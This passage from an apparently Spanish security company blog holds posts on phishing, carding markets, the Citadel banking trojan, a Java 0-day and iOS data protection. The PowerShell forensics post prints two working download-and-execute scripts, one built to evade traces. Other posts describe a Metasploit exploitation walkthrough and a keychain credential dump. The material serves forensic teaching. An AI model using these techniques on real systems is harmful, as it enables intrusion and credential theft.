    Así que me puse manos a la obra descargando todos los certificados que pude encontrar en la red. Pero al rato me di cuenta de que Internet es tirando a grande y que iba a tardar un poco. Así que para acortar decidí empezar primero por el millón de sitios más populares (Alexa) y le pedí ayuda a algunos compañeros.

    La respuesta rápida a si hay certificados de CA que son utilizados para servir SSL, es que si. Por "suerte" ninguno de los que hemos podido ver por ahora ha sido validado por una CA reconocida, así que no valen para hacer cosas malas.



    Del millón de sitios analizados, 419.218 respondían a conexiones SSL en el puerto 443 TCP. De ellos se descargaron y clasificaron los correspondientes certificados de servidor, de los cuales 41.724 tenían el atributo de CA a TRUE. Aunque como hemos dicho ninguno de ellos validado por una entidad de certificación reconocida.

    Además de comprobar si estos certificados tenían atributos de CA, se pueden realizar otros análisis sobre ellos en busca de posibles vulnerabilidades o debilidades criptográficas, como por ejemplo:
    - Validez del certificado
    - Algoritmos de firma vulnerables
    - Uso de llaves pequeñas
    - Llaves generadas con una versión vulnerable de Openssl (Debian)
    - Módulos duplicados
    - Factores duplicados
    - Exponentes pequeños
    - Factores pequeños



    Pero de esto ya os hablare en futuros artículos.

    Muchas gracias por su ayuda a:
    Francisco Caballero, Pedro Luis Fernández, Eugenio Delfa y Marc Rivero

    Ramón Pinuaga
    Dept. ACSS S21SEC

    Publicada el 18 February 2013 | Mon, 18 Feb 2013 04:45:00 -0500

    No bajes la guardia en San Valentín

    Una fecha señalada como es San Valentín es usada por los ciber-criminales para tratar de infectar usuarios.  A modo de carta de amor, envían postales vía correo electrónico. El usuario, ávido por abrir esta postal que le ha llegado vía email, quedará infectado por un troyano.

    El día de San Valentín es uno de los días preferidos por estas mafias para tratar de ampliar su red de ordenadores infectados. Aunque no se puede hablar de el día de San Valentín propiamente dicho, ya que no ocurre solo ese día, sino que los días de antes y después también se intentará poder infectar a la mayoría de usuarios posibles. Es decir, se trata de una temporada.

    Es recomendable poder seguir las buenas prácticas en el uso del correo electrónico, entre esas buenas prácticas se encuentra,

    • Escanear los archivos adjuntos: Es posible que el usuario reciba un correo atractivo que invite a abrir el archivo adjunto. Ese archivo podría ser un virus.
    • Correos de personas desconocidas: Es probable que recibas el correo desde una cuenta no habitual, pero esto no es significativo ya que pueden falsificar la dirección del remitente, para que el destinatario vea que es una dirección de confianza la que envía el correo.
    • Cadenas de correos: Recuerda de no reenviar cadenas, es una manera que tienen los criminales para obtener nuevas direcciones a las que enviar mas correo basura.
    • Datos privados: Recuerda que nadie te pedirá tu usuario o tu contraseña por correo electrónico, esto se aplica sobretodo a la banca online.
    • Enlaces: En algunos de los correos que se reciben es posible que vengan enlaces. Estos enlaces pueden llevar a páginas que exploten algún fallo e infecten a la víctima, o que sean dirigidas a un phishing, donde les pidan datos de la tarjeta de crédito, comúnmente llamado phishing.

    Estos puntos anteriores son algunas de las recomendaciones que se pueden seguir para mantener el correo electrónico seguro, de esa manera evitamos las famosas postales, que se envían en esta temporada.

    Como las tecnologías avanzan, se muestran nuevos escenarios donde los atacantes invierten esfuerzo, este es el caso de las redes sociales. En este tipo de entornos los usuarios tienden a relajarse en materia de seguridad y cometen ciertos actos que pueden llevarle al mismo punto en el que abría un enlace con malware que venía de un correo electrónico.

    La privacidad ha de hacerse latente, configurar aspectos, como religión, sexo, y gustos a usuarios que no conocemos en la red social es una buena práctica para que no nos envíen algo basado en nuestras preferencias y que probablemente acabemos abriendo. Los criminales además agregan a nuestros amigos en la red, de manera que cuando vas a revisar el perfil falso creado, podremos ver que tenemos personas en común, por lo que la confianza en este aspecto hará que bajemos la guardia.

    Las buenas prácticas a seguir en las redes sociales son muy parecidas al uso seguro del correo electrónico:

    1. No agregues a nadie que no conozcas
    2. No hagas clics en enlaces sospechosos... 
    3. El uso de acortadores URL e ingeniería social harán difícil que el usuario se pueda dar cuenta del peligro.


    Marc Rivero
    S21sec ecrime

    Publicada el 14 February 2013 | Thu, 14 Feb 2013 05:48:00 -0500

    Seguridad en el juego on-line

    Viendo la alta proliferación de operadores de juego online, veo interesante escribir el presente post, donde se analiza de forma resumida los requerimientos de seguridad que deben cumplir los operadores de juego.
    A finales de año 2011 en España se aprobaron diferentes resoluciones y órdenes ministeriales, donde la Comisión Nacional del Juego, establecía los requerimientos de seguridad que son necesarios que los operadores de juego implementen, para que éstos puedan ser habilitados para poder salir al mundo on-line.

    En este post, vamos a centrarnos en los requerimientos existentes desde el punto de vista de la Seguridad de los Sistemas de información, ya que en resumidas cuentas, la legislación vigente establece la necesidad de implantar un Sistema de Gestión de Seguridad de la Información, a través del cual se gestione la seguridad de los componentes críticos y del sistema técnico del juego.

    Además de la implantación de un SGSI, también se establece la obligación de realizar análisis de vulnerabilidades y test de intrusión con una periodicidad mínima de 2 años, por lo que es necesario establecer un plan de auditorías técnicas.

    Finalmente resaltar la obligación legal que tienen los operadores respecto al registro de los logs del sistema técnico de juego, registro de la trazabilidad de los usuarios. Es más la legislación establece expresamente lo siguiente en la disposición 5.1 del anexo de la  Disposición por la que se desarrollan las especificaciones técnicas que deben cumplir los sistemas técnicos de juego objeto de licencias otorgadas al amparo de la Ley 13/2011, de 27 de mayo, de regulación del juego

    “La monitorización y la supervisión de las actividades de juego realizadas por el operador se efectuará a través del sistema de control interno (en adelante, SCI), que los operadores deben implantar. El SCI debe incluir todos los participantes ubicados en España o con registro de usuario español, cualquiera que sea el medio de participación. El operador ha de establecer y mantener una línea de comunicación segura para el acceso de la Comisión Nacional del Juego, así como un servicio de consulta y descarga de datos disponible permanentemente para la Comisión Nacional del Juego.”

    Asimismo en la disposición 6 del anteriormente citado anexo, establece la obligación del operador respecto a la conservación de los registros y logs de todas decisiones del participante, del propio operador, de su personal o de sus sistemas, que tengan repercusión en el desarrollo del juego, en el registro de usuario, en las cuentas de juego o en los medios de pago.


    Koldo Peciña
    Project Manager S21sec

    Publicada el 13 February 2013 | Wed, 13 Feb 2013 03:55:00 -0500

    Actuación de la Justicia Española en Casos de Delitos Informáticos (resumen jornada)

    La Agencia de Certificaciones de Ciberseguridad retomó sus “Jueves Tecnológicos” con una nueva jornada cuyo tema fue la “Actuación de la Justicia Española en Casos de Delitos Informáticos”. Como figura experta en esta temática participó Dña. Elvira Tejada, Fiscal Jefe de la Fiscalía General de Estado, que se centró en el creciente fenómeno de la criminalidad informática que se ha convertido en un concepto impreciso y abierto por la dificultad que supone restringir su alcance.

    La labor que Elvira ha llevado a cabo en la coordinación a nivel nacional de las diferentes actuaciones gubernamentales contra la delincuencia informática, supone un amplio bagaje de cara a analizar los retos a los que se enfrentan los operadores jurídicos cuando tratan de perseguir y sancionar el uso ilícito de los avances tecnológicos en perjuicio de terceros o del interés general. De hecho, ésta es la razón que ha llevado al Ministerio Fiscal español a apostar por la especialización en este área como forma de garantizar una actuación rigurosa y efectiva frente a esta forma de criminalidad profundizando en este tema y buscando soluciones eficaces ante los problemas que plantean su investigación, enjuiciamiento y sanción.

    Al igual que en otras ocasiones, este Jueves Tecnológico fue de carácter gratuito y fue seguido tanto en la plataforma on-line de la ACC (Agencia de Certificaciones de Ciberseguridad) como presencialmente en la Sala de Grados de la Escuela Politécnica Superior del campus de la Universidad Autónoma de Madrid.

    Ya podéis ver en el siguiente enlace la última sesión de Jueves Tecnológico impartido el pasado 31 de Enero. Tener un poco de paciencia, que tarda un poco en cargar.

    Marketing S21sec

    Publicada el 7 February 2013 | Thu, 07 Feb 2013 10:27:00 -0500

    II Jornada de Seguridad en Villamuriel - Palencia


    Ayer tuvimos el placer de acudir a la "II Jornada de seguridad informática" en Villamuriel, Palencia.



    En esta Jornada tuvimos el placer de compartir escenario con David González y Chema Alonso. David mostró ejemplos reales de actividades ilícitas con sus correspondientes castigos, actividades en las que muchas veces el infractor no es consciente de las repercusiones de sus actos. De una manera muy amena, sirvió para concienciar a los asistentes de que debe tenerse mucho cuidado a la hora de utilizar cualquier tipo de información referente a otra persona.

    Chema, con su habitual soltura y humor, aclaró ciertos conceptos que muchas veces no están claros, dibujando una clara línea entre los investigadores de seguridad y los delincuentes, dos términos a los que muchas veces los medios de comunicación asocian la palabra "hacker". Mostró al público desde la manera de funcionar de una conferencia, hasta todo en el trabajo realizado por investigadores de seguridad de ámbito nacional e internacional, pasando por peticiones reales de ayuda, viendo tanto el mensaje como la gramática de los mismos.

    Por nuestra parte, mostramos el funcionamiento de los troyanos bancarios, empezando por los más sencillos y llegando hasta los más habituales (ZeuS, Citadel), explicando su comportamiento ante las medidas preventivas de las páginas web de las entidades financieras, así como unas reflexiones acerca de su evolución en el tiempo, tanto en funcionalidades como en técnicas de protección.

    Una jornada más que interesante. Solo nos queda agradecer el excelente trato recibido por la organización y asistentes.

    Miguel López-Negrete
    Mikel Gastesi
    S21sec ACSS

    Publicada el 24 January 2013 | Thu, 24 Jan 2013 11:08:00 -0500

    Pasaportes, Blogspot y online carding


    Uno de los aspectos más interesantes de nuestros paseos por el mundo underground es observar el constante esfuerzo de los trabajadores “del otro lado” para perfeccionar su negocio, buscando siempre nuevos nichos de mercado, y dando pasos para hacer su actividad más lucrativa, sencilla y segura. Los vendedores de tarjetas para realizar online carding no son ajenos a  este comportamiento. Desde principios del 2012, venimos observando cómo los vendedores más experimentados han optado progresivamente por emplear los foros únicamente como plataforma para anunciar sus productos y ganar reputación, mientras que el proceso de venta se realizaba en una tienda online personal. De esta forma, podían eludir el control de los administradores del foro y la comisión que obtienen de cada venta.

    Sin embargo este modelo no está exento de problemas, ya que la creación de un comercio online conlleva tiempo, puede sufrir un ataque DDoS a manos de la botnet de algún competidor y, por supuesto, cabe la posibilidad de que la base de datos sea comprometida. 

    Esta tendencia ha evolucionado hacia sencillos blogs alojados en Blogspot donde periódicamente las nuevas remesas de tarjetas son enlazadas en ficheros cifrados clasificados por países. Los compradores se enteran de las actualizaciones mediante RSS o anuncios en los foros donde el vendedor tiene presencia y ofrecen cierta cantidad al vendedor por el bloque que les interesa. El ganador de esta puja recibe la clave que permite descifrar el fichero.

    A pesar de que este modelo ofrece la sencillez y robustez que todo buen ciberdelincuente necesita, lo cierto es que no resulta aplicable para todos los productos del mundo under. Concretamente las falsificaciones de documentos siguen vendiéndose en tiendas online, en las que el comprador dispone de un área privada para detallar el tipo de trabajo que quiere (pasaporte, certificado de nacimiento, licencia de conducir, tarjeta de residencia, etc), enviar las fotos y datos que la nueva identidad requiere y especificar la dirección postal donde recibir la obra de arte ya terminada ;)


    Javier Barrios
    S21sec ACSS



    Publicada el 23 January 2013 | Wed, 23 Jan 2013 11:07:00 -0500

    Uso de mensajería instantánea (IM) en botnets

    Ya hace bastantes años que es común el uso de mensajería instantánea por distintas familias de malware. Y es que la IM (Instant Messaging) ha sido normalmente utilizada de forma habitual por los ciberdelincuentes para distribuir su malware, tradicionalmente mediante ingeniería social, con la publicación de un enlace y engañando a la víctima para que descargue el malware o bien para que acceda a un exploit kit. Siendo la máquina una vez infectada con el malware, también propicia para la generación de nuevos mensajes y enlaces que se propaguen entre los contactos.

    Prácticamente ninguna de las mensajerías más utilizadas (MSN, Skype, GTalk, Pidgin, el chat web de Facebook) se han quedado libre de tal uso. Pero no es la única función que se le ha dado a la IM. Con la aparición de las botnets, el IRC se convirtió en el medio clásico para que el botmaster se comunicara con su pequeño ejercito de máquinas infectadas, y así poderles dar órdenes. Típicamente una de las órdenes suele ser el envío de las contraseñas robadas, enviar los resultados del robo de dinero de la cuenta bancaria de la víctima, o simplemente conocer el estado del bot.

    Citadel, el troyano bancario de más auge últimamente, es uno de estos malware que son capaces o utilizan en ocasiones mensajería instantánea. Tal y como denota su panel de control, con un apartado llamado jabber-notifier, siendo capaz de utilizar jabber (protocolo XMPP) para obtener notificaciones.



    Desde el panel, es posible establecer comunicaciones con múltiples destinatarios a través de jabber. Incluso si los bots no pudieran enviar archivos de logs notificando su estado, existe la posibilidad de que se pudieran recibir estas notificaciones por jabber.

    Otra de las opciones disponibles para el botmaster es escanear diariamente sus bots con el servicio anónimo scan4you utilizando un servicio cron y recibir en jabber una notificación cuando uno de estos bots es detectado por varios antivirus.

    Como ya he comentado, en ocasiones la IM es utilizada por el botmaster para conocer en directo los resultados del robo de dinero de la cuenta bancaria de la víctima. La siguiente inyección de Citadel, nos deja vislumbrar pistas de que algo así es posible, en este caso con jabber:



    En esta ocasión, se utilizaba esta inyección para enviar unos datos al panel, en forma de log, haciendo un POST HTTP.

    Y es que en este caso, para establecer una conexión jabber, al estar las inyecciones insertadas en el dominio de la entidad bancaria, no se podría establecer con javascript una comunicación con un servidor de jabber externo, y establecer un GET de un xml en otro dominio, establecer una comunicación jabber. Es por ello que se requeriría de un servidor destino, que hiciera de cliente y gestionase las conexiones. A la inyección le correspondería un código similar a este:



    Y ese servidor destino, que haría de cliente, podría tener un código como el siguiente:


    Pero el uso de jabber en este troyano, no se queda ahí, sino que también, y esta es una de las novedades de los paneles de Citadel, se ha incorporado el panel de administración de VNC. Y ahora es posible trabajar con la API, pasarle el BotID o la dirección IP a través de una inyección, y establecer una conexión inversa de VNC mediante el envío de datos para conectar con jabber.



    Por último, jabber es utilizado para interactuar con la CRM Store. La CRM Store, es un sistema que sirve para comunicar a los clientes que compran los paneles de Citadel con los desarrolladores, no con personal de soporte de producto. De ese modo, se abre un ticket rápidamente en caso de bug, y puede ser rápidamente reparado. Así como se pueden proponer cambios y dar opiniones. Pudiendo el cliente enterarse de las novedades también.

    Podemos concluir por tanto, que el uso de la IM por malware y ciberdelincuentes, ha sido ampliado con el paso de los años, a medida que avanza la tecnología y aumenta su necesidad de keep in touch con sus bots y los desarrolladores de malware.

    Luis Miguel Laguna
    S21sec ACSS

    Publicada el 18 January 2013 | Fri, 18 Jan 2013 07:14:00 -0500

    Forense de scripts Powershell

    Powershell es una interfaz de scripting avanzado para Windows. Se incluye por defecto con Windows 7, 2008 y posteriores.

    Esto hace que cada día sea más popular entre la comunidad underground y que empiecen a publicarse herramientas de hacking basadas en Powershell.

    Es por tanto muy importante conocer qué tipo de evidencias deja la ejecución de scripts Powershell en un sistema comprometido para su posterior análisis forense.

    Para ver qué tipo de cambios hace un script de Powershell en nuestro equipo, podemos empezar analizando el comportamiento de un script sencillo:

    Write-Output "Hola Mundo"



    Las principales evidencias son:

    1. Se lanza el binario: powershell.exe (prefetch).
    2. Se actualiza el fichero: C:\Users\usuario\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    3. Se actualizan las llaves del registro: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count y HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count (userassist).
    4. Se crean una serie de eventos de Windows que van al registro de logs de aplicaciones y servicios, apartado "Windows PowerShell".
    Si además el código del script, en vez de introducirse directamente en el interprete de Powershell se incluye en un fichero de texto (normalmente con extensión ".ps1") y se invoca desde línea de comandos (p.e. con "powershell -ExecutionPolicy Unrestricted -File hello.ps1"), quedara rastro del mismo en disco. Aunque si el intruso es minimamente cuidadoso se habrá preocupado de borrarlo de forma segura o de haberlo cargado desde una carpeta remota.



    Bastantes datos para empezar a analizar. Es un buen punto de partida, pero en algunas situaciones podemos obtener incluso más detalles.





    Una de las características más poderosas de Powershell es la capacidad de permitir la carga de assemblies .NET de forma directa (cmdlet Add-Type). Lo que a su vez permite realizar llamadas a cualquier API de Win32. Esta funcionalidad es ampliamente utilizada por los programadores de herramientas de hacking para obtener acceso a las funciones de bajo nivel.

    Un script que hace uso de esta característica tiene un impacto mucho mayor en el sistema y deja una serie de evidencias muy interesantes. Para verlo, vamos a analizar el resultado de ejecutar un script de ejemplo que descarga un binario utilizando la función URLDownloadToFile() de "urlmon.dll" y lo ejecuta:

    $url = "

    http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe

    "
    $path = "c:\windows\temp\test.exe"


    $dnet = Add-Type -memberDefinition @"
      [DllImport("urlmon.dll")]
      public static extern int URLDownloadToFile(int pCaller, string szURL, string szFileName, int dwReserved, int lpfnCB);
    "@ -passthru -name Test


    $dnet::URLDownloadToFile(0, $url, $path, 0, 0)


    Invoke-Expression -command $path



    Nuevas evidencias interesantes:

    1. Se crean una serie de ficheros en "%TEMP%" con un nombre aleatorio. Estos ficheros contienen el código fuente .NET incluido en el script (parámetro memberDefinition) y los datos necesarios para compilarlo.
    2. Se lanza el binario "csc.exe" para la compilación y se guarda el output.
    3. Se eliminan todos los ficheros temporales.


    Esto se debe a que estamos utilizando código C# de forma inline y necesita ser compilado. Esta es la técnica que utilizan entre otros los payloads de Metasploit basados en Powershell y algunos de los scripts que presentaron David Kennedy y Josh Kelleyasi en la Defcon. Como veis no son demasiado discretos.



    Una forma menos ruidosa de invocar el API de Win32 desde Powershell es utilizar técnicas de reflexión, como lo hacen los scripts de PowerSploit. Estos scripts si que se ejecutan completamente en memoria y no dejan otros rastros forenses destacables.

    Modificando nuestro script para que trabaje con el API de Win32 de forma reflectiva, nos queda algo más complejo pero con similar funcionalidad:

    $url = "

    http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe

    "
    $path = "c:\windows\temp\test.exe"


    $domain = [AppDomain]::CurrentDomain
    $assembly = $domain.DefineDynamicAssembly('TestAssembly', 'Run')
    $module = $assembly.DefineDynamicModule('TestModule')
    $type = $module.DefineType('TestType')


    [Type[]]$parameterTypes = [int], [string], [string], [int], [int]
    $method = $type.DefineMethod('URLDownloadToFile', 'Public,Static', [int], $parameterTypes)


    $constructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor([string])
    $attr = New-Object Reflection.Emit.CustomAttributeBuilder $constructor, 'urlmon.dll'
    $method.SetCustomAttribute($attr)


    $realType = $type.CreateType()
    [object[]]$args = 0, $url, $path, 0, 0
    $realType.InvokeMember('URLDownloadToFile', 'Public,Static,InvokeMethod', $null, $null, $args)


    Invoke-Expression -command $path



    La ejecución de este script de ejemplo deja apenas el mismo rastro forense a nivel de Powershell que el inocente "Hola Mundo" (por supuesto obviando las evidencias que deja la propia función URLDownloadToFile() que son también bastantes y obviando que estamos dejando el EXE descargado en disco).

    Ramón Pinuaga
    S21sec

    Publicada el 16 January 2013 | Wed, 16 Jan 2013 03:49:00 -0500

    Nuevo 0day en Java

    Se ha dado a conocer recientemente una nueva vulnerabilidad para Java. El fallo no ha sido solucionado todavía y ya se está explotando de manera masiva. La noticia se daba a conocer de la mano del investigador en su blog, en él expone además de que los principales creadores de Exploits kits como Nuclear Exploit Kit, Blackhole, Sakura Exploit y Cool Exploit kit ya lo han incluído en su batería de Exploits, anunciado la disponibilidad en varios foros Underground.


    Esta vulnerabilidad podría ser aprovechada por un atacante para ejecutar código de forma remota y ha sido catalogada con el CVE 2012-4322.

    El malware que se está distribuyendo es el conocido "Malware de la policía" - Reventon y CbePlay

    Imagen del Blog malware.dontneedcoffee


    El malware que se descarga con la explotación del 0day, tiene protección contra ejecución en máquina virtual.

    • QEMU, 
    • VMWARE, 
    • VBOX,
    • VIRTUAL,

    Además incluye protecciones que tratan de detectar la presencia de herramientas de análisis como Wireshark, utilizada habitualmente para analizar el tráfico de red.

    El equipo de Metasploit ya ha liberado el módulo correspondiente.

    Si actualizamos el framework, el módulo quedará disponible para su uso.


    Para una prueba de concepto de la explotación de la vulnerabilidad, se escoge el módulo que acabamos de descargar:


    Mediante "show options", se comprueba que requerimientos tiene el módulo.




    Como parámetros requeridos el host y el puerto, se indican como parámetros:




    Cuando la víctima visita el enlace se explota la vulnerabilidad 0day, el mensaje que se le muestra por pantalla:



    Cuando el usuario haya entrado en la web manipulada con el exploit, conseguiremos acceso remoto con Meterpreter:



    Se ha conseguido el acceso a la máquina virtual explotando la vulnerabilidad



    Se recomienda deshabilitar Java en los navegadores hasta que Oracle saque una actualización para solucionar el fallo. En la documentación de Java podemos encontrar información sobre como deshabilitar Java


    Marc Rivero López

    S21sec ACSS

    (blog/twitter)



    Publicada el 11 January 2013 | Fri, 11 Jan 2013 04:51:00 -0500

    Data (Un)Protection en iOS

    Para los que no estén familiarizados con los sistemas iOS: Data Protection es uno de los mecanismos que ofrece Apple para proteger la información crítica que es almacenada internamente en el dispositivo. Su objetivo es evitar que contraseñas, certificados u otro tipo de información sea recuperada de un dispositivo perdido o robado. Para ello, Apple ha creado una serie de clases mediante las cuales es posible cifrar la información de diferentes maneras en función de su necesidad de accesibilidad:
    • When unlocked: La información se encuentra cifrada con una clave derivada del UID (clave única del dispositivo) y del Passcode elegido por el usuario, por lo que únicamente es accesible después de que el dispositivo haya sido desbloqueado por el usuario. 
    • While locked: No es habitual, pero está pensado para información que deba ser accedida mientras el dispositivo está bloqueado.
    • After first unlock: Es muy similar a "When unlocked", con la diferencia de que la clave de cifrado, derivada del UID y del Passcode, no es eliminada de la memoria al bloquear el dispositivo.
    • Always: La información se encuentra cifrada únicamente con el UID, con lo que es posible acceder a ella siempre, pero únicamente desde este dispositivo, ya que el UID es único a cada dispositivo iOS y este no es accesible por software.

    Los desarrolladores son, por lo tanto, responsables de escoger el tipo de protección que quieren para la información de sus aplicaciones. En el caso de la propia Apple, según indican en el documento oficial de seguridad en iOS, estos son los aplicados:


    Como sucede siempre, la usabilidad se encuentra reñida con la seguridad, así que nos encontramos con que si queremos permanecer conectados a una Wifi, recibir correo electrónico, recibir mensajes instantáneos, etc, es necesario que sus claves sean accesibles aunque el dispositivo se encuentre bloqueado. Al menos, la accesibilidad "After first unlock" hace que, tras un reinicio, sea necesario introducir el Passcode una primera vez para que esta información se encuentre disponible.

    Sin embargo, si un desarrollador no tiene cuidado con la clase elegida, puede encontrarse con que su información podría ser accedida sin necesidad ni tan siquiera de averiguar el Passcode empleado por el usuario. Es el caso, por ejemplo, de los certificados VPN, que como podemos ver les está asignada una accesibilidad "Always", lo cual quiere decir que son accesibles en cualquier momento, aunque nadie haya introducido el Passcode.

    Si hemos obtenido el control de un dispositivo iOS, una de las acciones que podemos querer realizar es volcar el contenido del KeyChain, que es donde se almacenan las credenciales, como por ejemplo las de Wifi o los propios certificados de la VPN. Para ello podemos usar la herramienta iphone-dataprotection que debemos ejecutar desde el propio dispositivo, para que este pueda descifrar usando el propio UID:

    # ./keychain_dump 
    Writing 10 passwords to genp.plist
    Writing 0 internet passwords to inet.plist
    Writing 6 certificates to cert.plist
    Writing 3 keys to keys.plist

    Esto nos va a devolver toda la información a la que podemos acceder en nuestra situación actual. En este caso se trata de un iOS que se encuentra bloqueado con Passcode, pero que ya ha sido desbloqueado una primera vez, así que si buscamos en los ficheros plist generados podremos ver, como comentábamos antes, algunos certificados VPN e incluso claves como puedan ser las claves de las Wifis a las que ha estado conectado:


    Esto es todo lo que podemos obtener SIN conocer el Passcode del usuario pero... ¿y si podemos averiguarlo? ¿y si el usuario ha elegido un Passcode demasiado trivial? Eso ya será otro post.


    Jose Selvi
    Dept. ACSS S21sec
    Twitter / Blog

    Publicada el 9 January 2013 | Wed, 09 Jan 2013 04:32:00 -0500

    Cambios en las afectaciones de Citadel

    El mundo de la seguridad lleva tiempo viendo cómo el troyano Citadel se ha convertido en el referente del malware bancario. Tras varios días investigando el comportamiento del mismo, y debido a la cantidad de muestras que están llegando a nuestras manos, hemos detectado un cambio (generalizando, ya que siempre hay alguna excepción) en la manera en que los ciberdelincuentes actúan sobre nuestros clientes que disponen del servicio de remediación y que está dando sus frutos, y nos basamos en que la afectación a dichos clientes ha disminuido respecto al resto de entidades afectadas (más de 400) a lo largo del último mes.

    En el siguiente gráfico espejo se observa que la tendencia de afectación de  Citadel a nuestros clientes es menor a lo largo del tiempo (línea verde) y obviamente aumenta la tendencia a que Citadel afecte a otras entidades (línea roja). Este gráfico abarca desde Noviembre hasta hoy.


    Del total de muestras recogidas durante el último mes, un 19% afectaban a nuestros clientes. De todos los incidentes generados durante este tiempo, solamente un 2,7% permanecen activos en este momento. Del total de incidentes generados para todas las entidades afectadas hay activos en este momento más de un 10%. A este dato influyen la menor afectación y la mejora en los procesos de remediación.

    Como dato curioso, en varias muestras se ha confirmado que los ciberdelincuentes eliminan la afectación a nuestros clientes manteniendo la afectación al resto de entidades, con el fin de poder mantener activas esas amenazas.

    Advanced Cyber Security Services
    S21sec

    Publicada el 12 December 2012 | Wed, 12 Dec 2012 12:12:00 -0500